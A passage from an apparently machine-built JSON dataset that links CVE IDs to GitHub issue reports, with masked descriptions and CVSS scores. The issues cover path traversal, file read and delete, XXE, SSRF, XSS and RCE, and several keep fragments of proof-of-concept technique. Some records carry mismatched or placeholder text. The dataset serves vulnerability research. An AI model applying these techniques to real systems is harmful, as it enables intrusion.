  58442. "Issue_Created_At": "2019-07-17T12:56:53Z",
  58443. "description": "User can escape from root directory. Windows, default File System, root directory set in login event callback. User can browse parent directory using PATHTAG in URL. Example: APITAG URL APITAG becomes a command APITAG At line NUMBERTAG in FILETAG we have APITAG So APITAG returns APITAG",
  58444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  58445. "severity": "CRITICAL",
  58446. "baseScore": 9.6,
  58447. "impactScore": 5.8,
  58448. "exploitabilityScore": 3.1
  58449. },
  58450. {
  58451. "CVE_ID": "CVE-2020-26566",
  58452. "Issue_Url_old": "https://github.com/Motion-Project/motion/issues/1227",
  58453. "Issue_Url_new": "https://github.com/motion-project/motion/issues/1227",
  58454. "Repo_new": "motion-project/motion",
  58455. "Issue_Created_At": "2020-10-20T11:12:34Z",
  58456. "description": "Could not supply a percent symbol for webcontrol param update. There is no way to put a percent symbol as param value, for example, APITAG : ERRORTAG URLTAG",
  58457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58458. "severity": "HIGH",
  58459. "baseScore": 7.5,
  58460. "impactScore": 3.6,
  58461. "exploitabilityScore": 3.9
  58462. },
  58463. {
  58464. "CVE_ID": "CVE-2020-26649",
  58465. "Issue_Url_old": "https://github.com/Drunyacoder/AtomXCMS-2/issues/19",
  58466. "Issue_Url_new": "https://github.com/drunyacoder/atomxcms-2/issues/19",
  58467. "Repo_new": "drunyacoder/atomxcms-2",
  58468. "Issue_Created_At": "2020-09-27T00:32:06Z",
  58469. "description": "APITAG NUMBERTAG FILETAG Arbitrary File Delete Vulnerability. In FILETAG FILETAG there is no validation of the input data, so we can delete any file. Payload: FILETAG FILETAG This vulnerability can delete the install-detection (installation lock) file, after which an attacker can reinstall your website.",
  58470. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  58471. "severity": "HIGH",
  58472. "baseScore": 8.1,
  58473. "impactScore": 5.2,
  58474. "exploitabilityScore": 2.8
  58475. },
  58476. {
  58477. "CVE_ID": "CVE-2020-26650",
  58478. "Issue_Url_old": "https://github.com/Drunyacoder/AtomXCMS-2/issues/20",
  58479. "Issue_Url_new": "https://github.com/drunyacoder/atomxcms-2/issues/20",
  58480. "Repo_new": "drunyacoder/atomxcms-2",
  58481. "Issue_Created_At": "2020-09-27T00:42:50Z",
  58482. "description": "FILETAG Arbitrary File Read Vulnerability. In admin/dump.php FILETAG there is no validation of the input, so we can use the php://filter wrapper with base NUMBERTAG encoding to read .php or other files. Payload: FILETAG",
  58483. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  58484. "severity": "MEDIUM",
  58485. "baseScore": 5.3,
  58486. "impactScore": 1.4,
  58487. "exploitabilityScore": 3.9
  58488. },
  58489. {
  58490. "CVE_ID": "CVE-2020-26682",
  58491. "Issue_Url_old": "https://github.com/libass/libass/issues/431",
  58492. "Issue_Url_new": "https://github.com/libass/libass/issues/431",
  58493. "Repo_new": "libass/libass",
  58494. "Issue_Created_At": "2020-09-26T13:22:12Z",
  58495. "description": "Bug in APITAG APITAG APITAG , APITAG , const APITAG , int, int, int): Assertion ERRORTAG rad >= eps' failed. Program received signal SIGABRT, Aborted NUMBERTAG ffff6efa NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG (gdb) t APITAG thread is NUMBERTAG APITAG NUMBERTAG ffff7fdb NUMBERTAG LWP NUMBERTAG gdb) bt NUMBERTAG ffff6efa NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6efc NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff6ef2bd7 in __assert_fail_base (fmt=<optimized out>, APITAG APITAG \"rad >= eps\", file=file APITAG APITAG \"ass_outline.c\", line=line APITAG APITAG APITAG APITAG APITAG , APITAG , const APITAG , int, int, int)\") at APITAG NUMBERTAG ffff6ef2c NUMBERTAG in __GI___assert_fail (assertion NUMBERTAG d NUMBERTAG APITAG \"rad >= eps\", file NUMBERTAG d NUMBERTAG APITAG \"ass_outline.c\", line NUMBERTAG function NUMBERTAG d NUMBERTAG APITAG APITAG APITAG , APITAG , const APITAG , int, int, int)\") at APITAG NUMBERTAG f in outline_stroke () at APITAG NUMBERTAG de NUMBERTAG in ass_outline_construct () at APITAG NUMBERTAG d in ass_cache_get () at ass_cache.c: ERRORTAG NUMBERTAG f2bb8 in get_bitmap_glyph () at APITAG NUMBERTAG ed5db in render_and_combine_glyphs () at APITAG NUMBERTAG e NUMBERTAG e9 in ass_render_event () at APITAG NUMBERTAG e NUMBERTAG d7 in ass_render_frame () at APITAG NUMBERTAG cc NUMBERTAG d in APITAG () at APITAG NUMBERTAG ccf5f in APITAG () at PATHTAG NUMBERTAG main () at PATHTAG",
  58496. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58497. "severity": "HIGH",
  58498. "baseScore": 8.8,
  58499. "impactScore": 5.9,
  58500. "exploitabilityScore": 2.8
  58501. },
  58502. {
  58503. "CVE_ID": "CVE-2020-26705",
  58504. "Issue_Url_old": "https://github.com/darkfoxprime/python-easy_xml/issues/1",
  58505. "Issue_Url_new": "https://github.com/darkfoxprime/python-easy_xml/issues/1",
  58506. "Repo_new": "darkfoxprime/python-easy_xml",
  58507. "Issue_Created_At": "2020-10-01T14:29:02Z",
  58508. "description": "XML External Entity Injection (XXE). The APITAG functionality is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. URLTAG Steps: We can inject a malicious external entity into the XML(xmldoc in the below line of code). APITAG Please contact me for the POC if required. Thanks.",
  58509. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  58510. "severity": "CRITICAL",
  58511. "baseScore": 9.1,
  58512. "impactScore": 5.2,
  58513. "exploitabilityScore": 3.9
  58514. },
  58515. {
  58516. "CVE_ID": "CVE-2020-26707",
  58517. "Issue_Url_old": "https://github.com/shenzhim/aaptjs/issues/2",
  58518. "Issue_Url_new": "https://github.com/shenzhim/aaptjs/issues/2",
  58519. "Repo_new": "shenzhim/aaptjs",
  58520. "Issue_Created_At": "2020-10-02T12:51:33Z",
  58521. "description": "Remote Code Execution (RCE) via insecure command formatting. User input is not restricted when it is formatted into the command, which results in the execution of arbitrary commands APITAG APITAG URLTAG Raised the same issue on HackerOne as well, with a POC: URLTAG",
  58522. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58523. "severity": "CRITICAL",
  58524. "baseScore": 9.8,
  58525. "impactScore": 5.9,
  58526. "exploitabilityScore": 3.9
  58527. },
  58528. {
  58529. "CVE_ID": "CVE-2020-26768",
  58530. "Issue_Url_old": "https://github.com/Formstone/Formstone/issues/286",
  58531. "Issue_Url_new": "https://github.com/formstone/formstone/issues/286",
  58532. "Repo_new": "formstone/formstone",
  58533. "Issue_Created_At": "2020-10-02T22:56:01Z",
  58534. "description": "XSS Vulnerability. Hi Formstone team. We are BRZTEC, an offensive information security firm from Brazil. While performing a pentest for one of our customers we found an XSS vulnerability that affects the default installation of Formstone. Could you tell us a secure channel through which we can send you more details about this vulnerability? Please visit the website CVETAG for details on how to request a CVE ID, and please acknowledge the finding to our company. If you have any difficulties, let us help you. Best Regards. Adriano Monteiro Information Security Specialist EMAILTAG NUMBERTAG FILETAG",
  58535. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58536. "severity": "MEDIUM",
  58537. "baseScore": 6.1,
  58538. "impactScore": 2.7,
  58539. "exploitabilityScore": 2.8
  58540. },
  58541. {
  58542. "CVE_ID": "CVE-2020-26772",
  58543. "Issue_Url_old": "https://github.com/george518/PPGo_Job/issues/56",
  58544. "Issue_Url_new": "https://github.com/george518/ppgo_job/issues/56",
  58545. "Repo_new": "george518/ppgo_job",
  58546. "Issue_Created_At": "2020-10-06T05:16:08Z",
  58547. "description": "There is an RCE vulnerability when running the agent. When the agent is running, we can send specially crafted TCP data to it, and it will execute any command without any restriction. // use agent ip and port ERRORTAG",
  58548. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58549. "severity": "CRITICAL",
  58550. "baseScore": 9.8,
  58551. "impactScore": 5.9,
  58552. "exploitabilityScore": 3.9
  58553. },
  58554. {
  58555. "CVE_ID": "CVE-2020-26800",
  58556. "Issue_Url_old": "https://github.com/ethereum/aleth/issues/5917",
  58557. "Issue_Url_new": "https://github.com/ethereum/aleth/issues/5917",
  58558. "Repo_new": "ethereum/aleth",
  58559. "Issue_Created_At": "2021-01-10T22:07:33Z",
  58560. "description": "Stack-based buffer overflow while parsing JSON file. Short description Stack-based buffer overflow while parsing a JSON file. Leads to APITAG Attack scenario An attacker can supply a specially crafted FILETAG file, consisting of NUMBERTAG or more left square brackets, which results in a segmentation fault in the application. This immediately results in Denial of Service, and with more advanced exploitation it could have further, higher-severity implications. Components Aleth NUMBERTAG Reproduction Create a .json file consisting of NUMBERTAG or more left square brackets ([). Run it using the following command: \"./aleth config \" followed by the .json file created earlier. The stack overflow can be examined with gdb (\"set args config . APITAG or with valgrind (\"valgrind ./aleth config . APITAG I submitted this bug to the bug bounty program in Oct NUMBERTAG but that kind of vulnerability is out of scope. As there was no intention to publish the vulnerability and issue a fix after NUMBERTAG months, I am responsibly disclosing it with the intention of helping the security team fix the issue, or mark the application as EOL if that is the case. As I didn't manage to properly compile the app with my fuzzer's compiler, I could use some insight into where the parser of the config file is. In any case, I would be happy to help and assist with the issue.",
  58561. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  58562. "severity": "MEDIUM",
  58563. "baseScore": 5.5,
  58564. "impactScore": 3.6,
  58565. "exploitabilityScore": 1.8
  58566. },
  58567. {
  58568. "CVE_ID": "CVE-2020-26880",
  58569. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/943",
  58570. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/943",
  58571. "Repo_new": "sympa-community/sympa",
  58572. "Issue_Created_At": "2020-05-24T08:01:47Z",
  58573. "description": "FILETAG will be published. [ ] Prepare pull request will merge it soon. [ ] New version of Sympa and a patch will be released.",
  58574. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58575. "severity": "HIGH",
  58576. "baseScore": 7.8,
  58577. "impactScore": 5.9,
  58578. "exploitabilityScore": 1.8
  58579. },
  58580. {
  58581. "CVE_ID": "CVE-2020-26880",
  58582. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/1009",
  58583. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/1009",
  58584. "Repo_new": "sympa-community/sympa",
  58585. "Issue_Created_At": "2020-10-07T15:31:58Z",
  58586. "description": "root privilege escalation from user sympa by modifying APITAG Version any Installation method any Expected behavior user 'sympa' only executes specific tasks as root and cannot gain more privileges, following the principle of privilege separation Actual behavior user 'sympa' can obtain full root shell access Additional information Following up on URLTAG > A more concrete vulnerability you document in your patch, is that APITAG (as well as its entire directory) is owned by user 'sympa', so an attacker who compromised [the 'sympa' user] can directly edit the main APITAG and escalate to root. Given that the configuration file is parsed as root through the setuid sympa_newaliases wrapper, and can execute arbitrary commands through its backticks syntax, there is an unintentional privilege escalation from sympa to full root shell access. The information is public in the aforementioned thread, hence this bug introduces no confidential information and is reported publicly as well. APITAG also allows for CVE assignment for small projects without a CNA able to run a full embargo procedure.) Mitigations include replacing the sympa_newaliases wrapper by an alternate alias manager, see e.g. URLTAG . Credit goes to MENTIONTAG .",
  58587. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58588. "severity": "HIGH",
  58589. "baseScore": 7.8,
  58590. "impactScore": 5.9,
  58591. "exploitabilityScore": 1.8
  58592. },
  58593. {
  58594. "CVE_ID": "CVE-2020-26947",
  58595. "Issue_Url_old": "https://github.com/monero-project/monero-gui/issues/3142",
  58596. "Issue_Url_new": "https://github.com/monero-project/monero-gui/issues/3142",
  58597. "Repo_new": "monero-project/monero-gui",
  58598. "Issue_Created_At": "2020-10-08T19:18:38Z",
  58599. "description": "fatal error: APITAG No such file or directory. My build failed with an error related to APITAG ERRORTAG In the code base I found a reference to APITAG URLTAG but that file doesn't exist.",
  58600. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58601. "severity": "HIGH",
  58602. "baseScore": 7.8,
  58603. "impactScore": 5.9,
  58604. "exploitabilityScore": 1.8
  58605. },
  58606. {
  58607. "CVE_ID": "CVE-2020-27155",
  58608. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6637",
  58609. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6637",
  58610. "Repo_new": "octopusdeploy/issues",
  58611. "Issue_Created_At": "2020-10-20T23:16:44Z",
  58612. "description": "APITAG polling endpoint can allow untrusted connections. Prerequisites [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . [x] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description If configured, the APITAG polling endpoint URLTAG can allow untrusted connections to be made under certain conditions. This endpoint is _not_ enabled by default. This issue does not affect Octopus Servers running on Linux, as the APITAG polling endpoint is not available there. Affected versions Octopus Server NUMBERTAG to NUMBERTAG Mitigation Upgrade to the latest available supported version of Octopus Server. Workarounds Disable the APITAG endpoint. Use the following commands to disable the APITAG endpoint. CODETAG Links CVE: CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  58614. "severity": "HIGH",
  58615. "baseScore": 7.5,
  58616. "impactScore": 3.6,
  58617. "exploitabilityScore": 3.9
  58618. },
  58619. {
  58620. "CVE_ID": "CVE-2020-27155",
  58621. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6639",
  58622. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6639",
  58623. "Repo_new": "octopusdeploy/issues",
  58624. "Issue_Created_At": "2020-10-20T23:49:24Z",
  58625. "description": "APITAG polling endpoint can allow untrusted connections. Tips for success NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58626. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  58627. "severity": "HIGH",
  58628. "baseScore": 7.5,
  58629. "impactScore": 3.6,
  58630. "exploitabilityScore": 3.9
  58631. },
  58632. {
  58633. "CVE_ID": "CVE-2020-27155",
  58634. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6640",
  58635. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6640",
  58636. "Repo_new": "octopusdeploy/issues",
  58637. "Issue_Created_At": "2020-10-20T23:51:07Z",
  58638. "description": "APITAG polling endpoint can allow untrusted connections NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58639. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  58640. "severity": "HIGH",
  58641. "baseScore": 7.5,
  58642. "impactScore": 3.6,
  58643. "exploitabilityScore": 3.9
  58644. },
  58645. {
  58646. "CVE_ID": "CVE-2020-27173",
  58647. "Issue_Url_old": "https://github.com/rust-vmm/vm-superio/issues/17",
  58648. "Issue_Url_new": "https://github.com/rust-vmm/vm-superio/issues/17",
  58649. "Repo_new": "rust-vmm/vm-superio",
  58650. "Issue_Created_At": "2020-10-14T07:54:28Z",
  58651. "description": "Implementation of the serial console may allocate an unbounded amount of memory. We have identified a possible APITAG issue in rust vmm/vm superio NUMBERTAG Issue Description The rust vmm/vm superio implementation of the serial console which emulates a UART port type NUMBERTAG A allows buffering an unlimited number of bytes from input sources when using the FIFO functionality. This issue can not be triggered from the guest side. This issue presents no impact to AWS Services. Impact All VMMs that are using the FIFO functionality to forward host side input from an untrusted source to the guest can be subject to a APITAG issue. This issue cannot be triggered from serial output generated by the guest. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host. Rate limiting the input from the host side also mitigates the issue. Affected Systems rust vmm/vm superio NUMBERTAG Proposed Mitigation Impact can be mitigated by upgrading to vm superio NUMBERTAG configuring memory limits to the process that is using vm superio, or by rate limiting the writes to the process standard input.",
  58652. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58653. "severity": "HIGH",
  58654. "baseScore": 7.5,
  58655. "impactScore": 3.6,
  58656. "exploitabilityScore": 3.9
  58657. },
  58658. {
  58659. "CVE_ID": "CVE-2020-27174",
  58660. "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/2177",
  58661. "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/2177",
  58662. "Repo_new": "firecracker-microvm/firecracker",
  58663. "Issue_Created_At": "2020-10-14T09:38:36Z",
  58664. "description": "Firecracker serial console emulation may allocate an unbounded amount of memory. We have identified an issue in the Firecracker serial console emulation of all Firecracker versions up to NUMBERTAG and Firecracker NUMBERTAG Issue Description The Firecracker implementation of the serial console emulation allows buffering of an unlimited number of bytes when data is written to the Firecracker process standard input at a high rate. Impact Firecracker customers that forward the standard input of the Firecracker process to untrusted users can become subject to APITAG attacks. If memory limits are not imposed on the Firecracker process, this might impair other APITAG on the same host from allocating memory, potentially becoming an availability issue. Serial output generated by the guest can\u2019t trigger the issue. Affected Systems Firecracker versions NUMBERTAG and NUMBERTAG while all older releases might be impacted. Mitigation Impact can be mitigated by applying memory limits to the Firecracker process or by applying a rate limit when writing to the Firecracker process standard input.",
  58665. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58666. "severity": "HIGH",
  58667. "baseScore": 7.5,
  58668. "impactScore": 3.6,
  58669. "exploitabilityScore": 3.9
  58670. },
  58671. {
  58672. "CVE_ID": "CVE-2020-27176",
  58673. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2360",
  58674. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2360",
  58675. "Repo_new": "marktext/marktext",
  58676. "Issue_Created_At": "2020-10-15T02:44:28Z",
  58677. "description": "Mutation XSS to RCE in APITAG Description There's a Cross Site Scripting (mutation XSS) that leads to Remote Code Execution (RCE) in APITAG NUMBERTAG Tested under Linux, have little doubt that the same issue is present in releases for all other platforms. Steps to reproduce NUMBERTAG Either create an .md file from scratch or in the \"source code mode\" add the following (without the backticks): ERRORTAG NUMBERTAG Either open the newly created file in APITAG or get back into the regular, main view mode NUMBERTAG Observe a popup with text APITAG Research\". Expected behavior: The APITAG is rendered as data, not executable code. Actual behavior: The APITAG is executed as code. Versions Mark Text version NUMBERTAG Operating system: presumably all, APITAG crafted for Linux. Notes This mutation XSS is possible due to the outdated APITAG library version. The XSS leads to RCE, as typical to Electron environments. To pop the calc in e.g. Gnome use the following payload: ERRORTAG The base NUMBERTAG encoded chunk is APITAG specific, but trivially adaptable to Windows or APITAG APITAG FILETAG Remediation The issue is caused (a) because of the outdated APITAG dependency, (b) more broadly, because HTML parsing is allowed. APITAG is a great piece of work, however various bypasses are naturally found every now and then. This means that APITAG always needs to stay on the bleeding edge to avoid similar issues. It may prove more scalable if the approach to avoiding Cross Site Scripting was more complex and in depth. As a short term fix, bumping up APITAG should help. CVSS NUMBERTAG I propose this CVSS vector FILETAG Thanks, Mark Art at Havoc Research.",
  58678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  58679. "severity": "CRITICAL",
  58680. "baseScore": 9.6,
  58681. "impactScore": 6.0,
  58682. "exploitabilityScore": 2.8
  58683. },
  58684. {
  58685. "CVE_ID": "CVE-2020-27195",
  58686. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/9129",
  58687. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/9129",
  58688. "Repo_new": "hashicorp/nomad",
  58689. "Issue_Created_At": "2020-10-20T17:41:09Z",
  58690. "description": "(placeholder).",
  58691. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  58692. "severity": "CRITICAL",
  58693. "baseScore": 9.1,
  58694. "impactScore": 5.2,
  58695. "exploitabilityScore": 3.9
  58696. },
  58697. {
  58698. "CVE_ID": "CVE-2020-27197",
  58699. "Issue_Url_old": "https://github.com/TAXIIProject/libtaxii/issues/246",
  58700. "Issue_Url_new": "https://github.com/taxiiproject/libtaxii/issues/246",
  58701. "Repo_new": "taxiiproject/libtaxii",
  58702. "Issue_Created_At": "2020-10-14T11:12:52Z",
  58703. "description": "Blind SSRF vulnerability. When content that starts with APITAG is passed to libtaxii's parse method, the library issues an HTTP GET request, even though APITAG is set to True on the XML parser. Executing ERRORTAG will trigger a GET request to ERRORTAG from URLTAG",
  58704. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58705. "severity": "CRITICAL",
  58706. "baseScore": 9.8,
  58707. "impactScore": 5.9,
  58708. "exploitabilityScore": 3.9
  58709. },
  58710. {
  58711. "CVE_ID": "CVE-2020-27197",
  58712. "Issue_Url_old": "https://github.com/eclecticiq/OpenTAXII/issues/176",
  58713. "Issue_Url_new": "https://github.com/eclecticiq/opentaxii/issues/176",
  58714. "Repo_new": "eclecticiq/opentaxii",
  58715. "Issue_Created_At": "2020-10-14T10:30:34Z",
  58716. "description": "Blind SSRF in APITAG Hi, my colleague APITAG Kota) and I were testing a locally deployed OpenTAXII instance and found that it is vulnerable to an SSRF issue, which can be exploited by adding URLTAG xml data> Sample POC: POST /services/discovery HTTP NUMBERTAG Host: APITAG Connection: close Accept Encoding: gzip, deflate Accept: application/xml User Agent: Cabby NUMBERTAG TAXII Accept: APITAG X TAXII Services: APITAG X TAXII Content Type: APITAG X TAXII Protocol: APITAG Content Type: application/xml Content Length NUMBERTAG FILETAG APITAG FILETAG",
  58717. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58718. "severity": "CRITICAL",
  58719. "baseScore": 9.8,
  58720. "impactScore": 5.9,
  58721. "exploitabilityScore": 3.9
  58722. },
  58723. {
  58724. "CVE_ID": "CVE-2020-27216",
  58725. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/5451",
  58726. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/5451",
  58727. "Repo_new": "eclipse/jetty.project",
  58728. "Issue_Created_At": "2020-10-15T19:44:57Z",
  58729. "description": "Improve Working Directory creation. Jetty version NUMBERTAG Java version All OS type/version All Description When the APITAG deploys an application, the temp directory creation is using an old Java Classlib API for creating unique directories. Let's modernize this, as newer Java Classlib APIs exist to make this a single step.",
  58730. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58731. "severity": "HIGH",
  58732. "baseScore": 7.0,
  58733. "impactScore": 5.9,
  58734. "exploitabilityScore": 1.0
  58735. },
  58736. {
  58737. "CVE_ID": "CVE-2020-27219",
  58738. "Issue_Url_old": "https://github.com/eclipse/hawkbit/issues/1067",
  58739. "Issue_Url_new": "https://github.com/eclipse/hawkbit/issues/1067",
  58740. "Repo_new": "eclipse/hawkbit",
  58741. "Issue_Created_At": "2021-01-11T07:26:25Z",
  58742. "description": "Cross site scripting vulnerability. Hi, our security team reported an issue with our Hawkbit instance: Request: POST to /cgi bin/ APITAG xss test APITAG .asp Response: {\"timestamp NUMBERTAG APITAG ERRORTAG APITAG APITAG PATHTAG APITAG .asp\"} I was able to reproduce this behavior on your sandbox instance (the request path is reflected in the error response). Btw. for GET requests the path is not returned. Could you please provide a fix or a workaround for that behavior? Kind regards, Holger",
  58743. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58744. "severity": "MEDIUM",
  58745. "baseScore": 6.1,
  58746. "impactScore": 2.7,
  58747. "exploitabilityScore": 2.8
  58748. },
  58749. {
  58750. "CVE_ID": "CVE-2020-27224",
  58751. "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/7954",
  58752. "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/7954",
  58753. "Repo_new": "eclipse-theia/theia",
  58754. "Issue_Created_At": "2020-06-03T20:15:17Z",
  58755. "description": "security] XSS vulnerability in markdown preview. Bug Description: XSS vulnerability in markdown preview. The Markdown Preview can be exploited to execute arbitrary code. Steps to Reproduce NUMBERTAG Create a markdown file and append the following text: APITAG NUMBERTAG Save and close the file NUMBERTAG Right click the file and select Open With > Preview NUMBERTAG Observe that the alert has fired. The root cause of the vulnerability is the current usage of [markdown it URLTAG to render html URLTAG and then adding the output to the DOM via APITAG URLTAG without sanitizing it. Moreover, there are several potential XSS sinks within the Theia code base that could potentially be exploited in a similar fashion (e.g. APITAG URLTAG , APITAG URLTAG ). Would the community be open to accepting contributions to mitigate these vulnerabilities, along with accompanying lint rules that would bar future usages of XSS sinks? Additional Information Operating System: Linux Theia Version NUMBERTAG",
  58756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  58757. "severity": "CRITICAL",
  58758. "baseScore": 9.6,
  58759. "impactScore": 6.0,
  58760. "exploitabilityScore": 2.8
  58761. },
  58762. {
  58763. "CVE_ID": "CVE-2020-27403",
  58764. "Issue_Url_old": "https://github.com/sickcodes/security/issues/1",
  58765. "Issue_Url_new": "https://github.com/sickcodes/security/issues/1",
  58766. "Repo_new": "sickcodes/security",
  58767. "Issue_Created_At": "2020-11-28T23:06:34Z",
  58768. "description": "Some models have a different open port for the webserver that exposes the root fs NUMBERTAG Tested on U NUMBERTAG P NUMBERTAG with Android 8. Installed F-Droid on the TV and APITAG (nmap) and scanned all ports on localhost APITAG Several open ports, and port NUMBERTAG contained the same http server with the entire fs available for free. Any app could this way access anything, bypassing all security. Not bound to the wifi ip address, however; perhaps already fixed remotely by TCL. The localhost binding is still present and several other services are available via localhost as well.",
  58769. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58770. "severity": "MEDIUM",
  58771. "baseScore": 6.5,
  58772. "impactScore": 3.6,
  58773. "exploitabilityScore": 2.8
  58774. },
  58775. {
  58776. "CVE_ID": "CVE-2020-27533",
  58777. "Issue_Url_old": "https://github.com/dedetech/issues/issues/16",
  58778. "Issue_Url_new": "https://github.com/dedetech/issues/issues/16",
  58779. "Repo_new": "dedetech/issues",
  58780. "Issue_Created_At": "2020-07-26T20:14:58Z",
  58781. "description": "Cross Site Scripting APITAG Affected software : APITAG Version NUMBERTAG Type of vulnerability : XSS APITAG Site Scripting) Author : Noth Description: APITAG CMS is susceptible to cross site scripting attacks, allowing malicious users to inject code into web pages; other users will be affected when viewing those web pages APITAG NUMBERTAG login admin page URLTAG FILETAG NUMBERTAG Type XSS Payload in the search ==> \"> APITAG alert NUMBERTAG APITAG FILETAG Test Video : URLTAG Reason: Failure to filter or escape special characters leads to vulnerabilities How to fix : escape special characters (context-aware output encoding) or filter them.",
  58782. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58783. "severity": "MEDIUM",
  58784. "baseScore": 5.4,
  58785. "impactScore": 2.7,
  58786. "exploitabilityScore": 2.3
  58787. },
  58788. {
  58789. "CVE_ID": "CVE-2020-27814",
  58790. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1283",
  58791. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1283",
  58792. "Repo_new": "uclouvain/openjpeg",
  58793. "Issue_Created_At": "2020-11-23T10:08:15Z",
  58794. "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow in the current master NUMBERTAG e URLTAG . I built openjpeg with ASAN; this is the ASAN report. POC picture : FILETAG ERRORTAG I also tried to confirm it without ASAN. ERRORTAG",
  58795. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58796. "severity": "HIGH",
  58797. "baseScore": 7.8,
  58798. "impactScore": 5.9,
  58799. "exploitabilityScore": 1.8
  58800. },
  58801. {
  58802. "CVE_ID": "CVE-2020-27828",
  58803. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/252",
  58804. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/252",
  58805. "Repo_new": "jasper-software/jasper",
  58806. "Issue_Created_At": "2020-11-30T09:22:12Z",
  58807. "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow in the current master NUMBERTAG URLTAG . I built jasper with ASAN; this is the ASAN report. POC picture : FILETAG ERRORTAG I also tried to confirm it without ASAN. It mallocs NUMBERTAG bytes in APITAG When APITAG it tries to write APITAG and causes a heap buffer overflow write.",
  58808. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58809. "severity": "HIGH",
  58810. "baseScore": 7.8,
  58811. "impactScore": 5.9,
  58812. "exploitabilityScore": 1.8
  58813. },
  58814. {
  58815. "CVE_ID": "CVE-2020-27848",
